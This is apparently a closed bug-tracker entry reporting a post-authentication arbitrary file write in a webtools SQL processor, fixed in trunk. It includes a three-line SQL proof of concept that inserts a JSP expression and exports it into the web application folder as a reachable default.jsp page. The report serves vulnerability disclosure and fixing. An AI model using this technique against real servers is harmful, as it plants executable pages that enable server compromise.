Details
-
Sub-task
-
Status: Closed
-
Major
-
Resolution: Fixed
-
Trunk
-
None
-
Bug Crush Event - 21/2/2015
Description
Shuibo Ye <shuiboye@gmail.com> reported a possible arbitary file write using webtools/control/EntitySQLProcessor.
In the "SQL Command" part, I create a table and insert some strings and export the table to a file one sentence at a time.
PoC: CREATE TABLE "test" (string VARCHAR(80))
INSERT INTO "test" (string) VALUES ('<%= system.getProperty("user.dir") %>')
call SYSCS_UTIL.SYSCS_EXPORT_TABLE(null,'test','.\framework\webtools\webapp\webtools\default.jsp',null,'*',null)After executing the three sentences,I successfully write the file and its url is https://localhost:8443/webtools/default.jsp.
Note: this is a post-auth vuln., So we did not create a CVE